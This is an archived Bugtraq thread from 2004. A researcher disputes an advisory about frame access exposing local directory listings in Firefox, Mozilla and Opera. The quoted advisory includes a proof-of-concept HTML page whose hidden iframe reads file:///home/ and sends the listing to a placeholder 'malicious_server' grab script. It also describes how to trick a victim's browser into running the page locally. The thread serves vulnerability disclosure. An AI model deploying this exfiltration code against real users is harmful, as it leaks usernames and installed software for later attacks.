RE: Disclosure of file system information in Mozilla Firefox and Opera Browser:

To: <badpenguin@xxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: RE: Disclosure of file system information in Mozilla Firefox and Opera Browser:
From: "Thor Larholm" <thor@xxxxxxxx>
Date: Mon, 6 Dec 2004 13:36:57 -0800
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Thread-index: AcTX0wGbC/SFbje5TYKb6FI/5PLdjgECIgRQ
Thread-topic: Disclosure of file system information in Mozilla Firefox and Opera Browser:

This is not a vulnerability, it is expected behavior.

Mozilla shares the same zone design as IE which means that a file from
the local file zone can read any other file from the local file zone.
You cannot use this approach to read a local file from another zone such
as the Internet zone. From the Internet zone, you can also only read the
content of files from the same zone, same protocol and same domain.

I agree that Mozilla has implemented quite a lot of proprietary IE
extensions which it should have not done, however reading the innerHTML
of an element through document.all does not circumvent the traditional
zone security checks already in place.

If you can find a cross zone scripting vulnerability in Mozilla this
becomes relevant, however in that case you would be better off jumping
into a chrome:// document from which you can execute arbitrary commands.


Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
23 Corporate Plaza #280
Newport Beach, CA 92660
http://www.pivx.com
thor@xxxxxxxx
Stock symbol: (PIVX.OB)
Phone: +1 (949) 231-8496
PGP: 0x4207AEE9
B5AB D1A4 D4FD 5731 89D6  20CD 5BDB 3D99 4207 AEE9

PivX defines a new genre in Desktop Security: Proactive Threat
Mitigation. 
<http://www.pivx.com/qwikfix>  

-----Original Message-----
From: Giovanni Delvecchio [mailto:badpenguin79@xxxxxxxxxxx] 
Sent: Wednesday, December 01, 2004 5:15 PM
To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Disclosure of file system information in Mozilla Firefox and
Opera Browser:

Title: Disclosure of file system information in Mozilla Firefox and
Opera 
Browser

Note:
I don't know if it could be considered really a security problem, anyway

i'll try to explain my ideas.
Sorry for my bad english.



Author: Giovanni Delvecchio

Bug: Disclosure of file system information


Applications affected:

- Firefox 1.0
- Mozilla 1.7
- Opera 7.54 (*)

( maybe also previous versions )


Tested versions:

- Firefox 1.0 on Linux and Windows
- Mozilla 1.7 on Windows
- Opera 7.51,..7.54 on Linux



Note:
The content of this advisory could be applied also to other browsers, i
have 
checked just Mozilla, Firefox,Opera and Microsoft Internet Explorer.
Microsoft Internet Explorer seems not to be affected.



Bug Description:
================
A problem exist in some browsers where a frame can gain access to
attributes 
of another frame or iframe.
An application of this bug could be the possibility to disclose local 
directory structure.



PoC:
===

------ begin code.htm -----

<html>

<body onLoad="

  list_files='';
  for(i=0;i<local_files.document.links.length;i++)
           {list_files+=local_files.document.links.item(i);}
  alert(list_files);
  //send list_files at malicious_server
  
document.location.href='http://malicious_server/grab.php?list='+list_fil
es;

              ">

<iframe name="local_files" src="file:///home/" height=0
width=0></iframe>


</body>

</html>

------ end of code.htm -------


Impact:
======
A malicious server could obtain the content of /home/ directory ( or 
c:\Document and Setting\ for windows system  ) and so know a set of 
usernames present on system target.
Moreover, colud be possible know if a particolar program is installed on

target system for a succesive attack.

Anyway it cannot be exploited "directly" by a remote site, but only if
the 
page is opened from a local path ( file://localpath/code.htm),  since
the 
iframe "local_files" belongs to a local domain.

Note: with Internet Explorer code.htm doesn't work even in local.



Possible Remote Exploitation:
========================

Question:
How could a malicious remote user exploit it ?

Answer:
After that the user "victim" has required
http://maliciuos_server/code.htm, 
if malicious_server responds with a page containing an unknown
Content-Type 
field ( for example text/html. ,note the dot) ,the browser will show a 
dialog window with some options (open, save, cancel). Choosing "Open" to

view this page, it will be downloaded and opened in local ; javascript
code 
will be executed in local context.
Obviously, if user chooses to save and after open it the result is
equal.

(*) For Opera this  method of remote exploitation requires that opera
must 
be setted as Default Application in "handler for saved files" whether
the 
user choose "Open" in the dialog window.



Solution:
========
No solution at the moment


Vendor notice
==============
24th November 2004: I have contacted mozilla by security@xxxxxxxxxxx
and Opera by its bug track page at https://bugs.opera.com/wizard/

No response from both at the moment.




Best regards,

Giovanni Delvecchio

_________________________________________________________________
Personalizza MSN Messenger con sfondi e fotografie! 
http://www.ilovemessenger.msn.it/

Prev by Date: MDKSA-2004:142 - Updated gzip packages fix temporary file vulnerability
Next by Date: Tool Announcement: AIRT -- the Advanced Incident Response Tool (linux)
Previous by thread: Re: Disclosure of file system information in Mozilla Firefox and Opera Browser:
Next by thread: SUSE Security Announcement: various kernel problems (SUSE-SA:2004:042)
Index(es):
- Date
- Thread